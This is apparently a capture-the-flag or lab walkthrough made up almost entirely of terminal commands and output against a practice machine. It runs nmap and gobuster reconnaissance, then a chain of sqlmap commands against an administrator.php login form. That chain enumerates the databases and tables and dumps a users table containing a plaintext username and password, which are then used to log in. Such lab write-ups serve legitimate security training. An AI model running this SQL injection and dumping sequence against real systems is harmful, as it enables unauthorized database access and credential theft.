$ nmap 10.10.249.70 -v
22/tcp open ssh
80/tcp open http
$ nmap 10.10.249.70 -v -A -p22,80
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
| 256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_ 256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster dir -u 10.10.249.70 -w /usr/share/wordlists/dirb/big.txt -x "php,txt"
$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users --tables
Database: users
[1 table]
+-------+
| users |
+-------+
$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users -T users --columns
Database: users
Table: users
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
| username | varchar(100) |
+----------+--------------+
$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users -T users --dump
Database: users
Table: users
[1 entry]
+----------+------------+
| username | password |
+----------+------------+
| pingudad | secretpass |
+----------+------------+
login with creds